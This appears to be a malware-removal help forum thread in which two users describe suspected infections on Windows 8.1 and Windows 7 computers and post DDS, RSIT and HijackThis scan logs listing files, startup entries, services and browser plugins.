2015-08-22 22:46:01 -------- d-----w- c:\program files\SigmaTel
2015-08-22 14:23:20 12872 ----a-w- c:\windows\system32\bootdelete.exe
2015-08-22 04:34:52 97560 ----a-w- c:\windows\system32\drivers\zam32.sys
2015-08-22 04:34:34 97560 ----a-w- c:\windows\system32\drivers\zamguard32.sys
2015-08-20 20:10:58 -------- d-----w- c:\programdata\HitmanPro
2015-08-16 21:06:40 -------- d-----w- c:\users\User\appdata\local\{6E9ECE0F-B878-4E61-8406-5EC4DB3D4962}
2015-08-16 20:04:48 -------- d-----w- c:\users\User\appdata\local\DriverToolkit
2015-08-15 14:05:59 -------- d-----w- c:\users\User\appdata\roaming\NeroDigital(TM)
2015-08-13 13:32:28 920088 ----a-w- c:\windows\system32\igxpun.exe
2015-08-13 12:37:49 39936 ----a-w- c:\windows\system32\drivers\rimmptsk.sys
2015-08-13 12:37:49 37376 ----a-w- c:\windows\system32\drivers\rixdptsk.sys
2015-08-13 12:37:49 16480 ----a-w- c:\windows\system32\rixdicon.dll
2015-08-13 12:37:48 42496 ----a-w- c:\windows\system32\drivers\rimsptsk.sys
2015-08-13 12:37:11 57344 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\ctor.dll
2015-08-13 12:37:11 32768 ----a-w- c:\program files\common files\installshield\professional\runtime\Objectps.dll
2015-08-13 12:37:11 237568 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\iscript.dll
2015-08-13 12:37:11 155648 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\iuser.dll
2015-08-13 12:37:10 692224 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\iKernel.dll
2015-08-13 12:37:10 5632 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\DotNetInstaller.exe
2015-08-13 12:37:10 163972 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\iGdi.dll
2015-08-13 12:37:09 282756 ----a-w- c:\program files\common files\installshield\professional\runtime\0701\intel32\setup.dll
2015-08-13 10:48:38 107608 ----a-w- c:\program files\common files\microsoft shared\office14\EXP_PDF.DLL
2015-08-13 04:01:05 56256 ----a-w- c:\windows\system32\drivers\mountmgr.sys
2015-08-13 04:01:05 49664 ----a-w- c:\windows\system32\csrsrv.dll
2015-08-13 04:01:05 140224 ----a-w- c:\windows\system32\drivers\ecache.sys
2015-08-13 04:01:05 1206192 ----a-w- c:\windows\system32\ntdll.dll
2015-08-13 04:01:05 10752 ----a-w- c:\windows\system32\msmmsp.dll
2015-08-13 04:01:04 564224 ----a-w- c:\windows\system32\emdmgmt.dll
2015-08-13 04:01:04 3605440 ----a-w- c:\windows\system32\ntkrnlpa.exe
2015-08-13 04:01:03 3553216 ----a-w- c:\windows\system32\ntoskrnl.exe
2015-08-13 03:59:53 103120 ----a-w- c:\windows\system32\PresentationCFFRasterizerNative_v0300.dll
2015-08-13 03:58:40 2067968 ----a-w- c:\windows\system32\mstscax.dll
2015-08-13 03:53:39 68608 ----a-w- c:\windows\system32\basesrv.dll
2015-08-13 03:42:39 682496 ----a-w- c:\windows\system32\d2d1.dll
2015-08-13 03:42:39 486400 ----a-w- c:\windows\system32\d3d10level9.dll
2015-08-13 03:42:39 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
2015-08-13 03:42:39 189952 ----a-w- c:\windows\system32\d3d10core.dll
2015-08-13 03:42:39 160768 ----a-w- c:\windows\system32\d3d10_1.dll
2015-08-13 03:42:39 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
2015-08-13 03:42:39 1029120 ----a-w- c:\windows\system32\d3d10.dll
2015-08-13 03:42:38 802304 ----a-w- c:\windows\system32\FntCache.dll
2015-08-13 03:42:38 1072640 ----a-w- c:\windows\system32\DWrite.dll
2015-08-13 03:41:08 199680 ----a-w- c:\windows\system32\WebClnt.dll
2015-08-13 03:40:46 151040 ----a-w- c:\windows\system32\notepad.exe
2015-08-13 03:40:46 151040 ----a-w- c:\windows\notepad.exe
2015-08-13 03:38:25 -------- d-----w- C:\DRIVERS
2015-08-13 03:25:39 53248 ----a-w- c:\windows\system32\RBK8F43.tmp
.
==================== Find3M ====================
.
2015-09-10 14:06:17 98520 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2015-08-31 22:48:00 499712 ----a-w- c:\windows\system32\msvcp71.dll
2015-08-31 22:48:00 348160 ----a-w- c:\windows\system32\msvcr71.dll
2015-08-17 17:18:19 1814016 ----a-w- c:\windows\system32\jscript9.dll
2015-08-17 17:14:56 367616 ----a-w- c:\windows\system32\html.iec
2015-08-17 17:12:06 1129472 ----a-w- c:\windows\system32\wininet.dll
2015-08-17 17:11:04 422400 ----a-w- c:\windows\system32\vbscript.dll
2015-08-17 17:11:02 1427968 ----a-w- c:\windows\system32\inetcpl.cpl
2015-08-17 17:10:36 142848 ----a-w- c:\windows\system32\ieUnatt.exe
2015-08-17 17:10:08 11776 ----a-w- c:\windows\system32\mshta.exe
2015-08-17 17:09:58 2382848 ----a-w- c:\windows\system32\mshtml.tlb
2015-08-14 05:22:27 1656 ----a-w- c:\windows\system32\ASOROSet.bin
2015-08-12 12:04:36 70168 ----a-w- c:\windows\system32\drivers\RapportHades.sys
2015-08-12 12:04:36 223000 ----a-w- c:\windows\system32\drivers\RapportKELL.sys
2015-08-11 22:33:16 778440 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2015-08-11 22:33:15 142536 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2015-08-04 23:03:08 877152 ----a-w- c:\windows\system32\msvcr120_clr0400.dll
2015-08-04 23:03:08 538208 ----a-w- c:\windows\system32\msvcp120_clr0400.dll
2015-07-28 10:02:10 250288 ----a-w- c:\windows\system32\drivers\avgidsdriverx.sys
2015-07-28 05:12:19 98520 ----a-w- c:\windows\system32\drivers\20F74CA3.sys
2015-07-23 15:44:26 31664 ----a-w- c:\windows\system32\drivers\avgidsshimx.sys
2015-07-13 06:14:14 202704 ----a-w- c:\windows\system32\drivers\eamonm.sys
2015-07-13 06:14:14 199608 ----a-w- c:\windows\system32\drivers\edevmon.sys
2015-07-13 06:14:14 144536 ----a-w- c:\windows\system32\drivers\ehdrv.sys
2015-07-13 06:14:14 132152 ----a-w- c:\windows\system32\drivers\epfwwfpr.sys
2015-07-03 16:04:03 1316864 ----a-w- c:\windows\system32\ole32.dll
2015-06-27 16:03:22 783872 ----a-w- c:\windows\system32\rpcrt4.dll
2015-06-27 16:02:55 218112 ----a-w- c:\windows\system32\msv1_0.dll
2015-06-27 16:02:34 501248 ----a-w- c:\windows\system32\kerberos.dll
2015-06-27 16:01:58 801280 ----a-w- c:\windows\system32\advapi32.dll
2015-06-27 14:21:13 217088 ----a-w- c:\windows\system32\drivers\mrxsmb10.sys
2015-06-27 14:21:10 81408 ----a-w- c:\windows\system32\drivers\mrxsmb20.sys
2015-06-24 00:29:00 1217192 ----a-w- c:\windows\system32\FM20.DLL
2015-06-23 12:27:10 246952 ------w- c:\windows\system32\MpSigStub.exe
2015-06-18 07:41:50 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2015-06-18 07:41:42 94936 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2015-06-18 07:41:36 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2015-06-17 16:50:20 2264576 ----a-w- c:\windows\system32\msi.dll
2015-06-17 15:09:17 73216 ----a-w- c:\windows\system32\msiexec.exe
2015-06-16 14:54:52 207328 ----a-w- c:\windows\system32\drivers\avgldx86.sys
.
============= FINISH: 17:40:06.23 ===============

Attached Files

dss Attach.txt (8.8 KB)

Hi,
First, thanks for being willing to provide this kind of support.

I followed all your steps, but when I double-click DDS, I get a message that it is not meant to run in compatibility mode.

I do not have any Windows discs, and I do not have an optical drive on my computer.

You asked for details, so here's my novel! I've also attached the details of my problem in a TXT file, which I used to copy/paste here, but lines seem to disappear, duplicate, or overwrite when I scroll through this box.

The things most worrisome to me: McAfee continues to do erratic things, the mysterious timestamp file in C:/USERS/MARLENE, the huge system files with the same timestamp, the skipped drive letter, and the remote support software is denied access to my computer.

So many things have gone wrong in the past week, it's hard to know where to start, but since McAfee is still doing erratic things, I'll start there.


I have a Dell Inspiron 15 5547 laptop, Windows 8.1, but I run on the Desktop about 99% of the time. I bought it Jan 2015, it came with McAfee installed and I am now VERY SORRY to say I never did anything about that to install better security software.

First possible problem: Thurs 9/3 McAfee update download hung at 75%. I waited awhile, cancelled and restarted it, hung at 0%. I bought Dell Concierge 3-year support service with the computer so I called them. They took remote control, uninstalled and reinstalled McAfee and the new downloads and updates worked.

Sat-Mon 9/5-7 (Labor Day weekend) we were having technical problems with cable service in my area. Service was up and down a lot so I wasn't on my computer much, but I am connected via WiFI, so just because I wasn't on my computer doesn't mean it wasn't connected some of the time. When I started working Tuesday 9/8, I had 80+ new emails. I use Microsoft Outlook 2007 email, desktop POP3 client, so my email is downloaded to my hard drive. The Send/Receive seemed to hang on the 4th email, but a friend sometime sends large video files so I just went online to do something else.

Internet Explorer started up with a very legitimate looking red McAfee Web Advisor banner that my firewall was not up and gave an option to start it or proceed without it. There was no way around this without making a choice, so I closed (X) Internet Explorer.

Then I got a very legitimate looking Windows Security popup on my desktop that indicated I had no firewall running and to choose to start either the Windows firewall or the McAfee firewall. I closed the dialog box
without choosing. I decided to call Dell to determine if they did something wrong when they reinstalled McAfee. Meanwhile, I checked and my email was still hung, so I closed MS Office Outlook.

Dell wanted me to try connecting with Google Chrome, but I don't have it installed. I do have Mozilla Firefox but it came up with the same red McAfee Web Advisor banner. They had me do a shutdown with the power button. When I started back up I was able to start IE. (And my email downloaded
ok.) However, when they tried to install their remote control software, it failed with an "access denied" error. We cleaned out temp files, reset IE, and got the same error. At that point they said all they could do was give me instructions to reset to factory setup and reinstall all my software. I said no, thank you, until I did some backups and attempted to determine if it was malware that could be removed.

All of this occurred between 11:45AM and 12:15PM Tuesday 9/8/15. Of course this is all happening in the middle of a project deadline, so I got my backup done and have been working offline as much as possible, just connecting once a day for 15-20 minutes to get my email and print anything I need, and keeping fingers crossed my computer doesn't completely crash.

Some odd things happened when I did my backup:
When I connected the external drive (USB) it connected as drive E instead of D. I disconnected it and put in a thumb drive, same thing, drive E. I don't know what's going on there.

I use NovaBackup to an external drive and typically backup C:/Users/Marlene. When I selected that folder for backup, at the top of Users/Marlene there was a folder I had never seen before named .oracle_je_usage and it had a Timestamp file in it dated 9/8/2015 11:55am. Since it was at the time I was having all the problems, I thought it was very suspicious, so (before reading your instructions) I copied it to an old thumb drive, deleted it and deleted it from the recycle bin. Then I did my data backup. Today the folder is back with a Timestamp file of 9/9 2:21pm.

Then, just because ... I don't necessarily know why, I decided to do a full C drive backup. I noticed 3 system files on C:\ with that 9/8 11:55am timestamp: hiberfil.sys 6.6GB, pagefile.sys 1.3GB, swapfile.sys 2.6MB.
Today, those files still have the 9/8 11:55am timestamp.

Now here I am on Saturday, ready to get this submitted to you. I wanted to do a quick backup of my changed documents and mail to a thumb drive and put in a couple to try to find one with space. I put in one I have used many times before. It "dinged" and a popup said it was installing "Ultra". I don't have a CLUE what that is about! "Ultra" does not show up on Control Panel as a program I can Uninstall. I opened a brand new thumb drive, did my current file backup, followed your instructions, and here I am.

Bottom line, I do not know if I was running without a firewall for days or not.

Since DDS won't run, what do I do now?

Attached Files

sept 8 problem.txt (4.7 KB)

Hi there,

I would be grateful for some help with this problem. My partner tried to download firefox from what turned out to be a dodgy site and this computer got infected. After running Mcafee and malwares bytes on it he kept finding new viruses and PUPs.

We don't have a Windows install disk as the computer came with Windows 7 already installed. I ran RSIT on it as DDS found problems with a script blocker and I couldn't figure out how to stop it.

Thanks for all your help.

Fabiana



Logfile of random's system information tool 1.10 (written by random/random)
Run by Leslie at 2015-09-13 19:04:48
Microsoft Windows 7 Professional Service Pack 1
System drive C: has 31 GB (13%) free of 232 GB
Total RAM: 24574 MB (85% free)
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:04:55, on 13/09/2015
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17937)
Boot mode: Normal
Running processes:
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files (x86)\NETGEAR\A6210\A6210.EXE
C:\Program Files (x86)\Analog Devices\Core\smax4pnp.exe
C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Users\Leslie\AppData\Local\Autodesk\.AdskAppManager\R1\AdAppMgr.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
c:\PROGRA~2\mcafee\SITEAD~1\saui.exe
C:\Users\Leslie\Desktop\RSIT.exe
C:\Program Files (x86)\trend micro\Leslie.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = Bing
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = MSN.com - Hotmail, Outlook, Skype, Bing, Latest News, Photos & Videos
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = Bing
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = Bing
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe,
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files (x86)\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [ADSKAppManager] "C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe" -showminimized -checkautorun
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [Dropbox] "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
O4 - HKLM\..\Run: [ArchVision Dashboard] C:\Program Files (x86)\ArchVision\Dashboard\Dashboard.exe /StartMinimized
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
O4 - HKCU\..\Run: [Web Companion] C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'Default user')
O4 - Global Startup: AutoCAD Startup Accelerator.lnk = C:\Program Files (x86)\Common Files\Autodesk Shared\acstart16.exe
O4 - Global Startup: NETGEAR A6210 Genie.lnk = C:\Program Files (x86)\NETGEAR\A6210\A6210.EXE
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted Zone: http://*.webcompanion.com
O18 - Protocol: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O18 - Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\PROGRA~2\mcafee\msc\mcsniepl.dll
O23 - Service: McAfee Application Installer Cleanup (0270371442166664) (0270371442166664mcinstcleanup) - McAfee, Inc. - C:\Windows\TEMP\027037~1.EXE
O23 - Service: Autodesk Application Manager Service (AdAppMgrSvc) - Autodesk Inc. - C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Autodesk Content Service - Autodesk, Inc. - C:\Program Files\Autodesk\Content Service\Connect.Service.ContentService.exe
O23 - Service: Autodesk Licensing Service - Autodesk, Inc. - C:\Program Files (x86)\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Dropbox Update Service (dbupdate) (dbupdate) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: Dropbox Update Service (dbupdatem) (dbupdatem) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FlexNet Licensing Service 64 - Flexera Software LLC - C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
O23 - Service: HitmanPro Scheduler (HitmanProScheduler) - SurfRight B.V. - C:\Program Files\HitmanPro\hmpsched.exe
O23 - Service: McAfee Home Network (HomeNetSvc) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: LiveUpdate (LiveUpdateSvc) - IObit - C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
O23 - Service: McAfee SiteAdvisor Service - McAfee, Inc. - C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe
O23 - Service: McAfee AP Service (McAPExe) - McAfee, Inc. - C:\Program Files\McAfee\MSC\McAPExe.exe
O23 - Service: McAfee CSP Service (mccspsvc) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\CSP\1.6.1008.0\McCSPServiceHost.exe
O23 - Service: McAfee Personal Firewall Service (McMPFSvc) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
O23 - Service: McAfee VirusScan Announcer (McNaiAnn) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
O23 - Service: McNeel Update Service 5.0 (McNeelUpdate) - Robert McNeel & Associates - c:\Program Files (x86)\McNeelUpdate\5.0\McNeelUpdateService.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\Program Files\McAfee\VirusScan\mcods.exe
O23 - Service: McAfee Platform Services (mcpltsvc) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Service Controller (mfemms) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: McAfee Anti-Spam Service (MSK80Service) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
O23 - Service: NetgearSwitchUSB - Unknown owner - C:\Program Files (x86)\NETGEAR\A6210\NetgearSwitchUSB.exe
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NVIDIA Performance Driver Service - Unknown owner - C:\Program Files\NVIDIA Corporation\Performance Drivers\nvPDsvc.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 12735 bytes
======Scheduled tasks folder======
C:\Windows\tasks\Adobe Flash Player Updater.job - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
C:\Windows\tasks\DropboxUpdateTaskMachineCore.job - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe /c
C:\Windows\tasks\DropboxUpdateTaskMachineUA.job - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe /ua /installsource scheduler
=========Mozilla firefox=========
ProfilePath - C:\Users\Leslie\AppData\Roaming\Mozilla\Firefox\Profiles\2i5y5qol.default
prefs.js - "browser.search.useDBForOrder" - true
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/ShockwavePlayer]
"Description"=Adobe Shockwave Player
"Path"=C:\Windows\SysWOW64\Adobe\Director\np32dsw_1217157.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/DTPlugin,version=11.60.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/JavaPlugin,version=11.60.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@mcafee.com/MSC,version=10]
"Description"=McAfee Total Protection MIME Plugin
"Path"=c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3528.0331]
"Description"=WLPG Install MIME type
"Path"=C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@nvidia.com/3DVision]
"Description"=NVIDIA stereo images plugin for Mozilla browsers
"Path"=C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@nvidia.com/3DVisionStreaming]
"Description"=NVIDIA 3D Vision Streaming plugin for Mozilla browsers
"Path"=C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll

C:\Users\Leslie\AppData\Roaming\Mozilla\Firefox\Profiles\2i5y5qol.default\extensions\
foxstart-cck@extensions.foxstart.com
C:\Users\Leslie\AppData\Roaming\Mozilla\Firefox\Profiles\2i5y5qol.default\searchplugins\
bing.xml
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll [2015-08-30 460384]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Windows Live ID Sign-in Helper - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17 441592]
